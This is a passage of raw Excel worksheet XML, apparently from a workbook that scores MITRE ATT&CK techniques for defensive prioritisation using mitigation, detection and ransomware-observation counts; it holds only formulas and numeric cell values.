        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L548">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M548" s="25">
        <v>0</v>
      </c>
      <c r="N548" s="51">
        <v>0</v>
      </c>
      <c r="O548" s="51">
        <v>0</v>
      </c>
      <c r="P548" s="51">
        <v>0</v>
      </c>
      <c r="Q548" s="51">
        <v>0</v>
      </c>
      <c r="R548" s="51"/>
      <c r="S548" s="51">
        <v>0</v>
      </c>
      <c r="T548" s="51"/>
      <c r="U548" s="51">
        <v>0</v>
      </c>
      <c r="V548" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W548">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X548">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y548">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z548">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA548">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB548">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC548" s="29" t="s">
        <v>1886</v>
      </c>
      <c r="AD548" s="25" t="str" cm="1">
        <f t="array" ref="AD548">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC548)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE548" s="25">
        <f>IF(AD548="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF548" s="25" t="str" cm="1">
        <f t="array" ref="AF548">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC548)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG548" s="25">
        <f>IF(AF548="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH548" s="25" t="str" cm="1">
        <f t="array" ref="AH548">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC548)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI548" s="25">
        <f>IF(AH548="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ548" s="25" t="str" cm="1">
        <f t="array" ref="AJ548">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC548)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK548" s="25">
        <f>IF(AJ548="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL548" s="25" t="str" cm="1">
        <f t="array" ref="AL548">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC548)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM548" s="25">
        <f>IF(AL548="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN548" s="52">
        <v>0</v>
      </c>
      <c r="AO548" s="51">
        <v>0</v>
      </c>
      <c r="AP548" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ548" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR548" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS548" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT548" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU54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49" spans="1:47" ht="32.1">
      <c r="A549" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B549" s="25">
        <f>SUM(H549,M549,V549)*(1+SUM(AE549,AG549,AI549,AK549,AM549))</f>
        <v>0.05</v>
      </c>
      <c r="C549" s="25" t="s">
        <v>1911</v>
      </c>
      <c r="D549" s="25" t="s">
        <v>1870</v>
      </c>
      <c r="E549" s="25" t="s">
        <v>1912</v>
      </c>
      <c r="F549" s="51">
        <v>0</v>
      </c>
      <c r="G549" s="51">
        <v>1</v>
      </c>
      <c r="H549" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I549">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J549">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K549">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L549">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M549" s="25">
        <v>0</v>
      </c>
      <c r="N549" s="51">
        <v>0</v>
      </c>
      <c r="O549" s="51">
        <v>0</v>
      </c>
      <c r="P549" s="51">
        <v>0</v>
      </c>
      <c r="Q549" s="51">
        <v>0</v>
      </c>
      <c r="R549" s="51"/>
      <c r="S549" s="51">
        <v>0</v>
      </c>
      <c r="T549" s="51"/>
      <c r="U549" s="51">
        <v>0</v>
      </c>
      <c r="V549" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W549">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X549">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y549">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z549">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA549">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB549">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC549" s="29" t="s">
        <v>1886</v>
      </c>
      <c r="AD549" s="25" t="str" cm="1">
        <f t="array" ref="AD549">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC549)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE549" s="25">
        <f>IF(AD549="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF549" s="25" t="str" cm="1">
        <f t="array" ref="AF549">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC549)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG549" s="25">
        <f>IF(AF549="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH549" s="25" t="str" cm="1">
        <f t="array" ref="AH549">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC549)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI549" s="25">
        <f>IF(AH549="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ549" s="25" t="str" cm="1">
        <f t="array" ref="AJ549">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC549)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK549" s="25">
        <f>IF(AJ549="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL549" s="25" t="str" cm="1">
        <f t="array" ref="AL549">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC549)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM549" s="25">
        <f>IF(AL549="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN549" s="60">
        <v>0</v>
      </c>
      <c r="AO549" s="51">
        <v>0</v>
      </c>
      <c r="AP549" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ549" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR549" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS549" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT549" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU54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50" spans="1:47" ht="32.1">
      <c r="A550" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B550" s="25">
        <f>SUM(H550,M550,V550)*(1+SUM(AE550,AG550,AI550,AK550,AM550))</f>
        <v>0.05</v>
      </c>
      <c r="C550" s="25" t="s">
        <v>1913</v>
      </c>
      <c r="D550" s="25" t="s">
        <v>1714</v>
      </c>
      <c r="E550" s="25" t="s">
        <v>1914</v>
      </c>
      <c r="F550" s="51">
        <v>0</v>
      </c>
      <c r="G550" s="51">
        <v>1</v>
      </c>
      <c r="H550" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I550">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J550">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K550">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L550">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M550" s="25">
        <v>0</v>
      </c>
      <c r="N550" s="51">
        <v>0</v>
      </c>
      <c r="O550" s="51">
        <v>0</v>
      </c>
      <c r="P550" s="51">
        <v>0</v>
      </c>
      <c r="Q550" s="51">
        <v>0</v>
      </c>
      <c r="R550" s="51"/>
      <c r="S550" s="51">
        <v>0</v>
      </c>
      <c r="T550" s="51"/>
      <c r="U550" s="51">
        <v>0</v>
      </c>
      <c r="V550" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W550">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X550">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y550">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z550">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA550">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB550">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC550" s="29" t="s">
        <v>178</v>
      </c>
      <c r="AD550" s="25" t="str" cm="1">
        <f t="array" ref="AD550">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC550)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE550" s="25">
        <f>IF(AD550="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF550" s="25" t="str" cm="1">
        <f t="array" ref="AF550">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC550)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG550" s="25">
        <f>IF(AF550="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH550" s="25" t="str" cm="1">
        <f t="array" ref="AH550">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC550)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI550" s="25">
        <f>IF(AH550="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ550" s="25" t="str" cm="1">
        <f t="array" ref="AJ550">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC550)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK550" s="25">
        <f>IF(AJ550="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL550" s="25" t="str" cm="1">
        <f t="array" ref="AL550">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC550)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM550" s="25">
        <f>IF(AL550="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN550" s="60">
        <v>0</v>
      </c>
      <c r="AO550" s="51">
        <v>0</v>
      </c>
      <c r="AP550" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ550" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR550" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS550" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT550" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU55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51" spans="1:47">
      <c r="A551" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B551" s="25">
        <f>SUM(H551,M551,V551)*(1+SUM(AE551,AG551,AI551,AK551,AM551))</f>
        <v>0.05</v>
      </c>
      <c r="C551" s="25" t="s">
        <v>1915</v>
      </c>
      <c r="D551" s="25" t="s">
        <v>1714</v>
      </c>
      <c r="E551" s="25" t="s">
        <v>1916</v>
      </c>
      <c r="F551" s="51">
        <v>0</v>
      </c>
      <c r="G551" s="51">
        <v>1</v>
      </c>
      <c r="H551" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I551">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J551">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K551">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L551">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M551" s="25">
        <v>0</v>
      </c>
      <c r="N551" s="51">
        <v>0</v>
      </c>
      <c r="O551" s="51">
        <v>0</v>
      </c>
      <c r="P551" s="51">
        <v>0</v>
      </c>
      <c r="Q551" s="51">
        <v>0</v>
      </c>
      <c r="R551" s="51"/>
      <c r="S551" s="51">
        <v>0</v>
      </c>
      <c r="T551" s="51"/>
      <c r="U551" s="51">
        <v>0</v>
      </c>
      <c r="V551" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W551">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X551">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y551">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z551">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA551">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB551">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC551" s="29" t="s">
        <v>1917</v>
      </c>
      <c r="AD551" s="25" t="str" cm="1">
        <f t="array" ref="AD551">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC551)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE551" s="25">
        <f>IF(AD551="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF551" s="25" t="str" cm="1">
        <f t="array" ref="AF551">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC551)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG551" s="25">
        <f>IF(AF551="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH551" s="25" t="str" cm="1">
        <f t="array" ref="AH551">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC551)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI551" s="25">
        <f>IF(AH551="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ551" s="25" t="str" cm="1">
        <f t="array" ref="AJ551">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC551)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK551" s="25">
        <f>IF(AJ551="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL551" s="25" t="str" cm="1">
        <f t="array" ref="AL551">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC551)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM551" s="25">
        <f>IF(AL551="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN551" s="52">
        <v>0</v>
      </c>
      <c r="AO551" s="51">
        <v>0</v>
      </c>
      <c r="AP551" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ551" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR551" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS551" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT551" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU55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52" spans="1:47" ht="32.1">
      <c r="A552" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B552" s="25">
        <f>SUM(H552,M552,V552)*(1+SUM(AE552,AG552,AI552,AK552,AM552))</f>
        <v>0.05</v>
      </c>
      <c r="C552" s="25" t="s">
        <v>1918</v>
      </c>
      <c r="D552" s="25" t="s">
        <v>1714</v>
      </c>
      <c r="E552" s="25" t="s">
        <v>1919</v>
      </c>
      <c r="F552" s="51">
        <v>0</v>
      </c>
      <c r="G552" s="51">
        <v>1</v>
      </c>
      <c r="H552" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I552">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J552">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K552">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L552">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M552" s="25">
        <v>0</v>
      </c>
      <c r="N552" s="51">
        <v>0</v>
      </c>
      <c r="O552" s="51">
        <v>0</v>
      </c>
      <c r="P552" s="51">
        <v>0</v>
      </c>
      <c r="Q552" s="51">
        <v>0</v>
      </c>
      <c r="R552" s="51"/>
      <c r="S552" s="51">
        <v>0</v>
      </c>
      <c r="T552" s="51"/>
      <c r="U552" s="51">
        <v>0</v>
      </c>
      <c r="V552" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W552">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X552">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y552">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z552">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA552">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB552">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC552" s="29" t="s">
        <v>178</v>
      </c>
      <c r="AD552" s="25" t="str" cm="1">
        <f t="array" ref="AD552">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC552)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE552" s="25">
        <f>IF(AD552="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF552" s="25" t="str" cm="1">
